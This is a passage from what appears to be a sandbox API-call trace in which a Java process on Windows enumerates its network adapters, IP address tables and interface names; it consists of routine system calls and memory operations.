(_Size=0x57) returned 0x12ee8ea0 [0111.183] strlen (_Str="eth1") returned 0x4 [0111.183] malloc (_Size=0x5) returned 0x121a5610 [0111.183] strcpy (in: _Dest=0x121a5610, _Source="eth1" | out: _Dest="eth1") returned="eth1" [0111.183] MultiByteToWideChar (in: CodePage=0x1, dwFlags=0x0, lpMultiByteStr=0x12f08ff0, cbMultiByte=43, lpWideCharStr=0x12ee8ea0, cchWideChar=43 | out: lpWideCharStr="Intel(R) 82574L Gigabit Network Connection") returned 43 [0111.183] GetFriendlyIfIndex (IfIndex=0x5) returned 0x5 [0111.183] _snprintf_s (in: _DstBuf=0x208c4e8, _DstSize=0x8, _MaxCount=0xffffffffffffffff, _Format="eth%d" | out: _DstBuf="eth2") returned 4 [0111.183] calloc (_Count=0x1, _Size=0x40) returned 0x12ef2d40 [0111.183] MultiByteToWideChar (in: CodePage=0x1, dwFlags=0x0, lpMultiByteStr=0x12f0934c, cbMultiByte=88, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 88 [0111.183] malloc (_Size=0xb1) returned 0x12f0bcc0 [0111.183] strlen (_Str="eth2") returned 0x4 [0111.184] malloc (_Size=0x5) returned 0x121a5590 [0111.184] strcpy (in: _Dest=0x121a5590, _Source="eth2" | out: _Dest="eth2") returned="eth2" [0111.184] MultiByteToWideChar (in: CodePage=0x1, dwFlags=0x0, lpMultiByteStr=0x12f0934c, cbMultiByte=88, lpWideCharStr=0x12f0bcc0, cchWideChar=88 | out: lpWideCharStr="Intel(R) 82574L Gigabit Network Connection-WFP Native MAC Layer LightWeight Filter-0000") returned 88 [0111.184] GetFriendlyIfIndex (IfIndex=0x6) returned 0x6 [0111.184] _snprintf_s (in: _DstBuf=0x208c4e8, _DstSize=0x8, _MaxCount=0xffffffffffffffff, _Format="eth%d" | out: _DstBuf="eth3") returned 4 [0111.184] calloc (_Count=0x1, _Size=0x40) returned 0x1228ed20 [0111.184] MultiByteToWideChar (in: CodePage=0x1, dwFlags=0x0, lpMultiByteStr=0x12f096a8, cbMultiByte=69, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0111.184] malloc (_Size=0x8b) returned 0x12ed4580 [0111.184] strlen (_Str="eth3") returned 0x4 [0111.184] malloc (_Size=0x5) returned 0x121a5670 [0111.184] strcpy (in: _Dest=0x121a5670, _Source="eth3" | out: _Dest="eth3") returned="eth3" [0111.184] MultiByteToWideChar (in: CodePage=0x1, dwFlags=0x0, lpMultiByteStr=0x12f096a8, cbMultiByte=69, lpWideCharStr=0x12ed4580, cchWideChar=69 | out: lpWideCharStr="Intel(R) 82574L Gigabit Network Connection-QoS Packet Scheduler-0000") returned 69 [0111.184] GetFriendlyIfIndex (IfIndex=0x7) returned 0x7 [0111.184] _snprintf_s (in: _DstBuf=0x208c4e8, _DstSize=0x8, _MaxCount=0xffffffffffffffff, _Format="eth%d" | out: _DstBuf="eth4") returned 4 [0111.184] calloc (_Count=0x1, _Size=0x40) returned 0x12ed3840 [0111.184] MultiByteToWideChar (in: CodePage=0x1, dwFlags=0x0, lpMultiByteStr=0x12f09a04, cbMultiByte=87, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 87 [0111.184] malloc (_Size=0xaf) returned 0x12f0bd80 [0111.184] strlen (_Str="eth4") returned 0x4 [0111.184] malloc (_Size=0x5) returned 0x121a55a0 [0111.184] strcpy (in: _Dest=0x121a55a0, _Source="eth4" | out: _Dest="eth4") returned="eth4" [0111.184] MultiByteToWideChar (in: CodePage=0x1, dwFlags=0x0, lpMultiByteStr=0x12f09a04, cbMultiByte=87, lpWideCharStr=0x12f0bd80, cchWideChar=87 | out: lpWideCharStr="Intel(R) 82574L Gigabit Network Connection-WFP 802.3 MAC Layer LightWeight Filter-0000") returned 87 [0111.184] GetFriendlyIfIndex (IfIndex=0x8) returned 0x8 [0111.185] free (_Block=0x12f08020) [0111.185] malloc (_Size=0x1c) returned 0x12ef10b0 [0111.185] GetProcAddress (hModule=0x7ffb57360000, lpProcName="GetIpAddrTable") returned 0x7ffb57378590 [0111.185] GetIpAddrTable (in: pIpAddrTable=0x12ef10b0, pdwSize=0x208c558, bOrder=0 | out: pIpAddrTable=0x12ef10b0, pdwSize=0x208c558) returned 0x7a [0111.670] realloc (_Block=0x12ef10b0, _Size=0x12c) returned 0x12eecb10 [0111.670] GetIpAddrTable (in: pIpAddrTable=0x12eecb10, pdwSize=0x208c558, bOrder=0 | out: pIpAddrTable=0x12eecb10, pdwSize=0x208c558) returned 0x0 [0111.673] malloc (_Size=0x48) returned 0x12f09f20 [0111.674] htonl (hostlong=0xff) returned 0xff000000 [0111.674] free (_Block=0x12eecb10) [0111.674] malloc (_Size=0x1c) returned 0x12ef10b0 [0111.674] GetIpAddrTable (in: pIpAddrTable=0x12ef10b0, pdwSize=0x208c558, bOrder=0 | out: pIpAddrTable=0x12ef10b0, pdwSize=0x208c558) returned 0x7a [0111.677] realloc (_Block=0x12ef10b0, _Size=0x12c) returned 0x12eedc90 [0111.677] GetIpAddrTable (in: pIpAddrTable=0x12eedc90, pdwSize=0x208c558, bOrder=0 | out: pIpAddrTable=0x12eedc90, pdwSize=0x208c558) returned 0x0 [0111.679] free (_Block=0x12eedc90) [0111.680] malloc (_Size=0x1c) returned 0x12ef10b0 [0111.680] GetIpAddrTable (in: pIpAddrTable=0x12ef10b0, pdwSize=0x208c558, bOrder=0 | out: pIpAddrTable=0x12ef10b0, pdwSize=0x208c558) returned 0x7a [0111.683] realloc (_Block=0x12ef10b0, _Size=0x12c) returned 0x12eec750 [0111.683] GetIpAddrTable (in: pIpAddrTable=0x12eec750, pdwSize=0x208c558, bOrder=0 | out: pIpAddrTable=0x12eec750, pdwSize=0x208c558) returned 0x0 [0111.685] free (_Block=0x12eec750) [0111.685] malloc (_Size=0x1c) returned 0x12ef10b0 [0111.685] GetIpAddrTable (in: pIpAddrTable=0x12ef10b0, pdwSize=0x208c558, bOrder=0 | out: pIpAddrTable=0x12ef10b0, pdwSize=0x208c558) returned 0x7a [0111.688] realloc (_Block=0x12ef10b0, _Size=0x12c) returned 0x12eec610 [0111.688] GetIpAddrTable (in: pIpAddrTable=0x12eec610, pdwSize=0x208c558, bOrder=0 | out: pIpAddrTable=0x12eec610, pdwSize=0x208c558) returned 0x0 [0111.690] free (_Block=0x12eec610) [0111.690] malloc (_Size=0x1c) returned 0x12ef10b0 [0111.690] GetIpAddrTable (in: pIpAddrTable=0x12ef10b0, pdwSize=0x208c558, bOrder=0 | out: pIpAddrTable=0x12ef10b0, pdwSize=0x208c558) returned 0x7a [0111.692] realloc (_Block=0x12ef10b0, _Size=0x12c) returned 0x12eec750 [0111.692] GetIpAddrTable (in: pIpAddrTable=0x12eec750, pdwSize=0x208c558, bOrder=0 | out: pIpAddrTable=0x12eec750, pdwSize=0x208c558) returned 0x0 [0111.695] malloc (_Size=0x48) returned 0x12f09b10 [0111.695] htonl (hostlong=0xffffff) returned 0xffffff00 [0111.695] free (_Block=0x12eec750) [0111.695] malloc (_Size=0x1c) returned 0x12ef1200 [0111.695] GetIpAddrTable (in: pIpAddrTable=0x12ef1200, pdwSize=0x208c558, bOrder=0 | out: pIpAddrTable=0x12ef1200, pdwSize=0x208c558) returned 0x7a [0111.708] realloc (_Block=0x12ef1200, _Size=0x12c) returned 0x12eec750 [0111.708] GetIpAddrTable (in: pIpAddrTable=0x12eec750, pdwSize=0x208c558, bOrder=0 | out: pIpAddrTable=0x12eec750, pdwSize=0x208c558) returned 0x0 [0111.711] free (_Block=0x12eec750) [0111.711] malloc (_Size=0x1c) returned 0x12ef0690 [0111.711] GetIpAddrTable (in: pIpAddrTable=0x12ef0690, pdwSize=0x208c558, bOrder=0 | out: pIpAddrTable=0x12ef0690, pdwSize=0x208c558) returned 0x7a [0111.740] realloc (_Block=0x12ef0690, _Size=0x12c) returned 0x12eec610 [0111.741] GetIpAddrTable (in: pIpAddrTable=0x12eec610, pdwSize=0x208c558, bOrder=0 | out: pIpAddrTable=0x12eec610, pdwSize=0x208c558) returned 0x0 [0111.744] free (_Block=0x12eec610) [0111.745] malloc (_Size=0x1c) returned 0x12ef10b0 [0111.745] GetIpAddrTable (in: pIpAddrTable=0x12ef10b0, pdwSize=0x208c558, bOrder=0 | out: pIpAddrTable=0x12ef10b0, pdwSize=0x208c558) returned 0x7a [0111.747] realloc (_Block=0x12ef10b0, _Size=0x12c) returned 0x12eec250 [0111.747] GetIpAddrTable (in: pIpAddrTable=0x12eec250, pdwSize=0x208c558, bOrder=0 | out: pIpAddrTable=0x12eec250, pdwSize=0x208c558) returned 0x0 [0111.751] free (_Block=0x12eec250) [0111.751] malloc (_Size=0x1000) returned 0x12f0a030 [0111.751] GetProcAddress (hModule=0x7ffb57360000, lpProcName="GetAdaptersAddresses") returned 0x7ffb57362a20 [0111.751] GetAdaptersAddresses (in: Family=0x0, Flags=0x1c, Reserved=0x0, AdapterAddresses=0x12f0a030, SizePointer=0x208c578*=0x1000 | out: AdapterAddresses=0x12f0a030*(Alignment=0x12307740, Length=0x12307740, IfIndex=0x0, Next=0x122ea420, AdapterName=0x0, FirstUnicastAddress=0x0, FirstAnycastAddress=0x0, FirstMulticastAddress=0x0, FirstDnsServerAddress=0x0, DnsSuffix=0x0, Description=0x0, FriendlyName=0x0, PhysicalAddress=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0), PhysicalAddressLength=0x0, Flags=0x0, DdnsEnabled=0x0, RegisterAdapterSuffix=0x0, Dhcpv4Enabled=0x0, ReceiveOnly=0x0, NoMulticast=0x0, Ipv6OtherStatefulConfig=0x0, NetbiosOverTcpipEnabled=0x0, Ipv4Enabled=0x0, Ipv6Enabled=0x0, Ipv6ManagedAddressConfigurationSupported=0x0, Mtu=0x0, IfType=0x0, OperStatus=0x0, Ipv6IfIndex=0x0, ZoneIndices=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0), FirstPrefix=0x0, TransmitLinkSpeed=0x0, ReceiveLinkSpeed=0x0, FirstWinsServerAddress=0x0, FirstGatewayAddress=0x0, Ipv4Metric=0x0, Ipv6Metric=0x0, Luid=0x0, Dhcpv4Server.lpSockaddr=0x0, Dhcpv4Server.iSockaddrLength=0, CompartmentId=0x0, NetworkGuid=0x0, ConnectionType=0x0, TunnelType=0x0, Dhcpv6Server.lpSockaddr=0x0, Dhcpv6Server.iSockaddrLength=0, Dhcpv6ClientDuid=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0), Dhcpv6ClientDuidLength=0x0, Dhcpv6Iaid=0x0, FirstDnsSuffix=0x0), SizePointer=0x208c578*=0x11b0) returned 0x6f [0111.757] realloc (_Block=0x12f0a030, _Size=0x21b0) returned 0x12307740 [0111.757] GetAdaptersAddresses (in: Family=0x0, Flags=0x1c, Reserved=0x0, AdapterAddresses=0x12307740, SizePointer=0x208c578*=0x21b0 | out: AdapterAddresses=0x12307740*(Alignment=0x5000001c0, Length=0x1c0, IfIndex=0x5, Next=0x12307c48, AdapterName="{E25A642B-6CEB-4194-8F83-8BC82AF94F5A}", FirstUnicastAddress=0x123079a8, FirstAnycastAddress=0x0, FirstMulticastAddress=0x0, FirstDnsServerAddress=0x0, DnsSuffix="", Description="Intel(R) 82574L Gigabit Network Connection", FriendlyName="Ethernet", PhysicalAddress=([0]=0x0, [1]=0x10, [2]=0x63, [3]=0x8b, [4]=0x98, [5]=0xa6, [6]=0x0, [7]=0x0), PhysicalAddressLength=0x6, Flags=0x1c5, DdnsEnabled=0x1c5, RegisterAdapterSuffix=0x1c5, Dhcpv4Enabled=0x1c5, ReceiveOnly=0x1c5, NoMulticast=0x1c5, Ipv6OtherStatefulConfig=0x1c5, NetbiosOverTcpipEnabled=0x1c5, Ipv4Enabled=0x1c5, Ipv6Enabled=0x1c5, Ipv6ManagedAddressConfigurationSupported=0x1c5, Mtu=0x5dc, IfType=0x6, OperStatus=0x1, Ipv6IfIndex=0x5, ZoneIndices=([0]=0x5, [1]=0x5, [2]=0x5, [3]=0x5, [4]=0x1, [5]=0x1, [6]=0x1, [7]=0x1, [8]=0x1, [9]=0x1, [10]=0x1, [11]=0x1, [12]=0x1, [13]=0x1, [14]=0x0, [15]=0x1), FirstPrefix=0x12307a58, TransmitLinkSpeed=0x3b9aca00, ReceiveLinkSpeed=0x3b9aca00, FirstWinsServerAddress=0x0, FirstGatewayAddress=0x0, Ipv4Metric=0xa, Ipv6Metric=0xa, Luid=0x6008000000000, Dhcpv4Server.lpSockaddr=0x12307900*(sa_family=2, sin_port=0x0, sin_addr="192.168.0.1"), Dhcpv4Server.iSockaddrLength=16, CompartmentId=0x1, NetworkGuid=0x11eb6c9dc20d55b0, ConnectionType=0x1, TunnelType=0x0, Dhcpv6Server.lpSockaddr=0x0, Dhcpv6Server.iSockaddrLength=0, Dhcpv6ClientDuid=([0]=0x0, [1]=0x1, [2]=0x0, [3]=0x1, [4]=0x28, [5]=0xb6, [6]=0x27, [7]=0xf2, [8]=0x0, [9]=0x1b, [10]=0x48, [11]=0xc9, [12]=0x81, [13]=0xd6, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0), Dhcpv6ClientDuidLength=0xe, Dhcpv6Iaid=0x300053a, FirstDnsSuffix=0x0), SizePointer=0x208c578*=0x21b0) returned 0x0 [0111.767] calloc (_Count=0x1, _Size=0x48) returned 0x12f09f70 [0111.768] wcslen (_String="Software Loopback Interface 1") returned 0x1d [0111.770] htonl (hostlong=0x100007f) returned 0x7f000001 [0111.771] htonl (hostlong=0xffffff7f) returned 0x7fffffff [0111.773] wcslen (_String="Microsoft Kernel Debug Network Adapter") returned 0x26 [0111.773] wcslen (_String="Microsoft ISATAP Adapter") returned 0x18 [0111.778] wcslen (_String="Teredo Tunneling Pseudo-Interface") returned 0x21 [0111.779] wcslen (_String="Intel(R) 82574L Gigabit Network Connection") returned 0x2a [0111.779] htonl (hostlong=0x6100a8c0) returned 0xc0a80061 [0111.779] htonl (hostlong=0xff00a8c0) returned 0xc0a800ff [0111.780] wcslen (_String="Intel(R) 82574L Gigabit Network Connection-WFP Native MAC Layer LightWeight Filter-0000") returned 0x57 [0111.780] wcslen (_String="Intel(R) 82574L Gigabit Network Connection-QoS Packet Scheduler-0000") returned 0x44 [0111.781] wcslen (_String="Intel(R) 82574L Gigabit Network Connection-WFP 802.3 MAC Layer LightWeight Filter-0000") returned 0x56 [0111.781] free (_Block=0x121a5570) [0111.782] free (_Block=0x12ef2b10) [0111.782] free (_Block=0x12f09f20) [0111.782] free (_Block=0x12f09660) [0111.782] free (_Block=0x12ef28e0) [0111.782] free (_Block=0x121a56c0) [0111.782] free (_Block=0x12ee9680) [0111.783] free (_Block=0x12ef2980) [0111.783] free (_Block=0x121a5600) [0111.783] free (_Block=0x12ef3b50) [0111.783] free (_Block=0x12f096b0) [0111.783] free (_Block=0x12ef29d0) [0111.783] free (_Block=0x121a55c0) [0111.783] free (_Block=0x12ef2ca0) [0111.783] free (_Block=0x12f09de0) [0111.783] free (_Block=0x12f09fc0) [0111.784] free (_Block=0x12ef2b60) [0111.784] free (_Block=0x121a5610) [0111.784] free (_Block=0x12ee8ea0) [0111.784] free (_Block=0x12f09b10) [0111.784] free (_Block=0x12f09f70) [0111.785] free (_Block=0x12ef2cf0) [0111.785] free (_Block=0x121a5590) [0111.785] free (_Block=0x12f0bcc0) [0111.785] free (_Block=0x12ef2d40) [0111.785] free (_Block=0x121a5670) [0111.785] free (_Block=0x12ed4580) [0111.785] free (_Block=0x1228ed20) [0111.785] free (_Block=0x121a55a0) [0111.786] free (_Block=0x12f0bd80) [0111.788] free (_Block=0x12ed3840) [0111.788] strlen (_Str="java/net/NetworkInterface$2.class") returned 0x21 [0111.788] malloc (_Size=0x48) returned 0x12ef28e0 [0111.788] malloc (_Size=0xa0) returned 0x12324b70 [0111.788] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3329838, lpNewFilePointer=0x208b690, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b690*=53647416) returned 1 [0111.788] ReadFile (in: hFile=0x134, lpBuffer=0x12324b70, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b660, lpOverlapped=0x0 | out: lpBuffer=0x12324b70*, lpNumberOfBytesRead=0x208b660*=0xa0, lpOverlapped=0x0) returned 1 [0111.792] malloc (_Size=0x22) returned 0x12ef10b0 [0111.796] malloc (_Size=0x1000) returned 0x12307740 [0111.796] GetAdaptersAddresses (in: Family=0x0, Flags=0x1c, Reserved=0x0, AdapterAddresses=0x12307740, SizePointer=0x208c610*=0x1000 | out: AdapterAddresses=0x12307740*(Alignment=0x12d79f80, Length=0x12d79f80, IfIndex=0x0, Next=0x122ea420, AdapterName="{E25A642B-6CEB-4194-8F83-8BC82AF94F5A}", FirstUnicastAddress=0x123079a8, FirstAnycastAddress=0x0, FirstMulticastAddress=0x0, FirstDnsServerAddress=0x0, DnsSuffix="", Description="Intel(R) 82574L Gigabit Network Connection", FriendlyName="Ethernet", PhysicalAddress=([0]=0x0, [1]=0x10, [2]=0x63, [3]=0x8b, [4]=0x98, [5]=0xa6, [6]=0x0, [7]=0x0), PhysicalAddressLength=0x6, Flags=0x1c5, DdnsEnabled=0x1c5, RegisterAdapterSuffix=0x1c5, Dhcpv4Enabled=0x1c5, ReceiveOnly=0x1c5, NoMulticast=0x1c5, Ipv6OtherStatefulConfig=0x1c5, NetbiosOverTcpipEnabled=0x1c5, Ipv4Enabled=0x1c5, Ipv6Enabled=0x1c5, Ipv6ManagedAddressConfigurationSupported=0x1c5, Mtu=0x5dc, IfType=0x6, OperStatus=0x1, Ipv6IfIndex=0x5, ZoneIndices=([0]=0x5, [1]=0x5, [2]=0x5, [3]=0x5, [4]=0x1, [5]=0x1, [6]=0x1, [7]=0x1, [8]=0x1, [9]=0x1, [10]=0x1, [11]=0x1, [12]=0x1, [13]=0x1, [14]=0x0, [15]=0x1), FirstPrefix=0x12307a58, TransmitLinkSpeed=0x3b9aca00, ReceiveLinkSpeed=0x3b9aca00, FirstWinsServerAddress=0x0, FirstGatewayAddress=0x0, Ipv4Metric=0xa, Ipv6Metric=0xa, Luid=0x6008000000000, Dhcpv4Server.lpSockaddr=0x12307900*(sa_family=2, sin_port=0x0, sin_addr="192.168.0.1"), Dhcpv4Server.iSockaddrLength=16, CompartmentId=0x1, NetworkGuid=0x11eb6c9dc20d55b0, ConnectionType=0x1, TunnelType=0x0, Dhcpv6Server.lpSockaddr=0x0, Dhcpv6Server.iSockaddrLength=0, Dhcpv6ClientDuid=([0]=0x0, [1]=0x1, [2]=0x0, [3]=0x1, [4]=0x28, [5]=0xb6, [6]=0x27, [7]=0xf2, [8]=0x0, [9]=0x1b, [10]=0x48, [11]=0xc9, [12]=0x81, [13]=0xd6, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0), Dhcpv6ClientDuidLength=0xe, Dhcpv6Iaid=0x300053a, FirstDnsSuffix=0x0), SizePointer=0x208c610*=0x11b0) returned 0x6f [0111.800] realloc (_Block=0x12307740, _Size=0x21b0) returned 0x12307740 [0111.800] GetAdaptersAddresses (in: Family=0x0, Flags=0x1c, Reserved=0x0, AdapterAddresses=0x12307740, SizePointer=0x208c610*=0x21b0 | out: AdapterAddresses=0x12307740*(Alignment=0x5000001c0, Length=0x1c0, IfIndex=0x5, Next=0x12307c48, AdapterName="{E25A642B-6CEB-4194-8F83-8BC82AF94F5A}", FirstUnicastAddress=0x123079a8, FirstAnycastAddress=0x0, FirstMulticastAddress=0x0, FirstDnsServerAddress=0x0, DnsSuffix="", Description="Intel(R) 82574L Gigabit Network Connection", FriendlyName="Ethernet", PhysicalAddress=([0]=0x0, [1]=0x10, [2]=0x63, [3]=0x8b, [4]=0x98, [5]=0xa6, [6]=0x0, [7]=0x0), PhysicalAddressLength=0x6, Flags=0x1c5, DdnsEnabled=0x1c5, RegisterAdapterSuffix=0x1c5, Dhcpv4Enabled=0x1c5, ReceiveOnly=0x1c5, NoMulticast=0x1c5, Ipv6OtherStatefulConfig=0x1c5, NetbiosOverTcpipEnabled=0x1c5, Ipv4Enabled=0x1c5, Ipv6Enabled=0x1c5, Ipv6ManagedAddressConfigurationSupported=0x1c5, Mtu=0x5dc, IfType=0x6, OperStatus=0x1, Ipv6IfIndex=0x5, ZoneIndices=([0]=0x5, [1]=0x5, [2]=0x5, [3]=0x5, [4]=0x1, [5]=0x1, [6]=0x1, [7]=0x1, [8]=0x1, [9]=0x1, [10]=0x1, [11]=0x1, [12]=0x1, [13]=0x1, [14]=0x0, [15]=0x1), FirstPrefix=0x12307a58, TransmitLinkSpeed=0x3b9aca00, ReceiveLinkSpeed=0x3b9aca00, FirstWinsServerAddress=0x0, FirstGatewayAddress=0x0, Ipv4Metric=0xa, Ipv6Metric=0xa, Luid=0x6008000000000, Dhcpv4Server.lpSockaddr=0x12307900*(sa_family=2, sin_port=0x0, sin_addr="192.168.0.1"), Dhcpv4Server.iSockaddrLength=16, CompartmentId=0x1, NetworkGuid=0x11eb6c9dc20d55b0, ConnectionType=0x1, TunnelType=0x0, Dhcpv6Server.lpSockaddr=0x0, Dhcpv6Server.iSockaddrLength=0, Dhcpv6ClientDuid=([0]=0x0, [1]=0x1, [2]=0x0, [3]=0x1, [4]=0x28, [5]=0xb6, [6]=0x27, [7]=0xf2, [8]=0x0, [9]=0x1b, [10]=0x48, [11]=0xc9, [12]=0x81, [13]=0xd6, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0), Dhcpv6ClientDuidLength=0xe, Dhcpv6Iaid=0x300053a, FirstDnsSuffix=0x0), SizePointer=0x208c610*=0x21b0) returned 0x0 [0111.803] malloc (_Size=0x1c0) returned 0x12309900 [0111.804] GetAdaptersAddresses (in: Family=0x0, Flags=0x1c, Reserved=0x0, AdapterAddresses=0x12307740, SizePointer=0x208c610*=0x1000 | out: AdapterAddresses=0x12307740*(Alignment=0x12d79f80, Length=0x12d79f80, IfIndex=0x0, Next=0x122ea420, AdapterName="{E25A642B-6CEB-4194-8F83-8BC82AF94F5A}", FirstUnicastAddress=0x123079a8, 